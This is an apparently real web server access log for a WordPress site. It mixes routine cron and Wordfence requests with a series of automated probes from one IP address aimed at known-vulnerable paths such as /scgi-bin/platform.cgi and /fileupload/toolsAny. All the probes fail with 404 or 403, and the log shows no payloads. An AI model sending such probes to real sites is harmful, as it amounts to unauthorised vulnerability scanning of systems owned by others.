103.4.122.14 - - [14/Jan/2026:00:12:03 +0800] "POST /wp-cron.php?doing_wp_cron=1768320723.8492319583892822265625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:12:00 +0800] "POST /app/options.py HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/110.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:00:12:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768320734.5217559337615966796875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:12:11 +0800] "POST /login?create_account=1 HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:00:12:28 +0800] "POST /wp-cron.php?doing_wp_cron=1768320748.4554231166839599609375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:12:25 +0800] "POST /scgi-bin/platform.cgi HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (Debian; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [14/Jan/2026:00:12:35 +0800] "POST /wp-cron.php?doing_wp_cron=1768320755.2358169555664062500000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:12:32 +0800] "POST /scgi-bin/platform.cgi HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
165.232.54.158 - - [14/Jan/2026:00:13:00 +0800] "POST /fileupload/toolsAny HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
103.4.122.14 - - [14/Jan/2026:00:13:06 +0800] "POST /?wordfence_syncAttackData=1768320786.5744 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:13:04 +0800] "GET /authenticationendpoint/38btk5clf2huhghwoztdxqtmzqi.jsp HTTP/1.1" 404 10885 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
